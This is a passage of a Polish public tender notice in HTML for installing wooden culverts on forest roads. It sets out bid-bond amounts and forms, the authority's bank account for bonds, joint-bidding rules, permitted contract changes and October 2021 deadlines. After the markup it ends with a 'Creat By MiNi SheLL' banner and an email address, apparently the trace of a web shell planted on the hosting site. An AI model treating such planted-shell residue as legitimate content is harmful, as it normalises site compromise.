dopuszczenie do udziału w postępowaniu;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Przed zawarciem umowy Wykonawca jest zobowiązany wnieść zabezpieczenie należytego<br/>wykonania umowy w wysokości i formie określonej w Rozdziale VI pkt. 3 SWZ<br/>2) Przed zawarciem umowy Wykonawca będzie zobowiązany przedstawić Zamawiającemu<br/>uprawnienia budowlane osób, które będą pełniły funkcję kierownika budowy/kierownika robót oraz potwierdzenie przynależności do właściwej izby samorządu zawodowego.<br/>3) Przed zawarciem umowy przedłożyć Zamawiającemu polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności ważną przez cały okres realizacji zamówienia.<br/>4) Przed zawarciem umowy Wykonawca jest zobowiązany przekazać Zamawiającemu kosztorys, z którego wynikać będzie cena ofertowa. Kosztorys należy opracować tzw. metodą szczegółową. Do kosztorysu należy załączyć zestawienie robocizny, materiałów i sprzętu użytych do realizacji zamówienia. Kosztorys należy sporządzić w podziale na każdy z etapów robót oddzielnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: <br/>a)	dla Części 1 zamówienia - 500,00 zł<br/>b)	dla Części 2 zamówienia - 1500,00 zł<br/>c)	dla Części 3 zamówienia - 1500,00 zł<br/>d)	dla Części 4 zamówienia - 150,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. z dnia 28<br/>stycznia 2020 r. Dz. U. z 2020 r. poz. 299).<br/>3. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy<br/>Zamawiającego w BANKU SPÓŁDZIELCZYM WĘGIERSKA GÓRKA nr rachunku: 33 8131 0005 0000 1094 2000 0010 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Osadzanie wodospustów drewnianych drążonych na drogach leśnych, część zamówienia nr _______________.” 4. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego.<br/>5. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>6. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt 2)-4)<br/>należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego<br/>wystawienia.<br/>7. Wadium musi zabezpieczać ofertę zamówienia przez cały okres związania ofertą.<br/>8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy,<br/>lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub<br/>złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3Ustawy PZP<br/>zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 Ustawy PZP w zw, z<br/>art. 266 Ustawy PZP.<br/>9. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –określenie<br/>przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>10. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 -5 Ustawy PZP.<br/>11. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wniesienie<br/>wadium w formie niepieniężnej w postaci dokumentu gwarancji/poręczenia wystawionego na<br/>jednego z tych Wykonawców, będzie wystarczające dla skutecznego zabezpieczenia oferty<br/>wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale V.2.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>5) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których<br/>realizacji te uprawnienia są wymagane.<br/>6) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>7) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana umowy może nastąpić wyłącznie za obopólną zgodą stron, w formie pisemnej pod rygorem nieważności, z zastrzeżeniem ust. 2.<br/>2.	Zmiana umowy może nastąpić w następujących przypadkach:<br/>1)	opisanych w poprzedzających paragrafach umowy,<br/>2)	wskazanych w ustawie - Prawo zamówień publicznych,<br/>3)	co do zmiany terminu wykonania umowy w razie:<br/>a.	zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy – o ilość dni zawieszenia robot,<br/>b.	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności a za które odpowiedzialności nie ponosi Wykonawca – o ilość dni nie wykonywania umowy z powodu wskazanych okoliczności,<br/>c.	konieczności zaspokojenia roszczeń lub oczekiwań osób trzecich, uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron – o ilość dni nie wykonywania robót z powodu wskazanych okoliczności,<br/>d.	wystąpienia zdarzeń siły wyższej – o ilość dni przerwy w wykonywaniu robót spowodowanej siłą wyższą (tj. przez okoliczności nadzwyczajne, nieprzewidywalne bądź też niemożliwe do uniknięcia mimo możliwości ich przewidzenia, w szczególności: klęski żywiołowe, katastrofy, zamieszki, epidemie, embarga itp.), <br/>e.	konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, na podstawie której realizowana jest umowa - o ilość dni niezbędną na dokonanie zmian w dokumentacji.<br/>3. Strona starająca się o zwolnienie z odpowiedzialności, niezwłocznie po wystąpieniu siły wyższej oraz po powzięciu wiadomości o jej wpływie na terminowe i prawidłowe wykonanie Umowy, powiadomi na piśmie drugą Stronę o powyższym zdarzeniu i jego wpływie na jej zdolność do realizacji Umowy. <br/>f.	w przypadku opóźnień w realizacji przedmiotu zamówienia wynikających z konieczności wykonywania nieprzewidzianych wcześniej robót budowlanych na terenie budowy, powstałych z przyczyn niezawinionych przez Wykonawcę, w szczególności w przypadku ujawnienia w trakcie robót urządzeń podziemnych elementów instalacji, konstrukcji, których istnienie lub lokalizacja były nieujawnione przy opracowywaniu dokumentacji projektowej - o okres tych opóźnień,<br/>g.	konieczności wykonania zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego lub innych zamówień powiązanych, których udzielenie i wykonanie stało się konieczne lub celowe i które mają wpływ na termin realizacji niniejszego zamówienia,<br/>h.	wystąpieniem niezależnych od Wykonawcy przyczyn technologicznych wpływającymi na realizację przedmiotu zamówienia i przyjęte rozwiązania technologiczne,<br/>i.	wystąpieniem okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-08 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na e-PUAP i udostępnionego na miniPortalu, do dnia 08.10.2021r., godz. 9:30</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Ofertę należy sporządzić zgodnie z załącznikiem nr 1 do SWZ: druk Formularz ofertowy. Wraz<br/>	z ofertą Wykonawca jest zobowiązany złożyć:<br/> a) oświadczenia, o których mowa w Rozdziale V. pkt 2. SWZ;<br/> b) pełnomocnictwo (jeżeli dotyczy – załącznik nr 2 do SWZ).<br/>	2) Wykonawca składa ofertę za pośrednictwem Platformy EPUAP.<br/>	3) Wykonawca może złożyć tylko jedną ofertę. Treść oferty musi odpowiadać treści SWZ.<br/>	4) Oferta powinna być sporządzona w języku polskim, w formie elektronicznej lub w postaci<br/>	elektronicznej opatrzonej elektronicznym kwalifikowanym podpisem, podpisem zaufanym lub<br/>	podpisem osobistym osoby uprawnionej do reprezentowania wykonawcy.<br/>	5) Zamawiający informuje, iż zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji<br/>stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, wraz z przekazaniem takich<br/>informacji, zastrzegł, że nie mogą być one udostępniane oraz wykazał, że zastrzeżone<br/>informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o<br/>których mowa w art. 222 ust. 5. Ustawy Pzp. Wszelkie informacje stanowiące tajemnice<br/>przedsiębiorstw, które Wykonawca pragnie zastrzec jako tajemnice przedsiębiorstwa, powinny<br/>zostać złożone w osobnym pliku wraz z adnotacją „Tajemnica przedsiębiorstwa”.<br/>6) W przypadku podpisywania oferty przez osobę nieuprawnioną zgodnie z zapisami w<br/>dokumentach rejestrowych do oferty należy dołączyć pełnomocnictwo. Pełnomocnictwo musi<br/>być złożone w oryginale lub kopii poświadczonej notarialnie w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej elektronicznym kwalifikowanym podpisem, podpisem<br/>zaufanym lub podpisem osobistym – przykładowy wzór stanowi załącznik nr 2 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com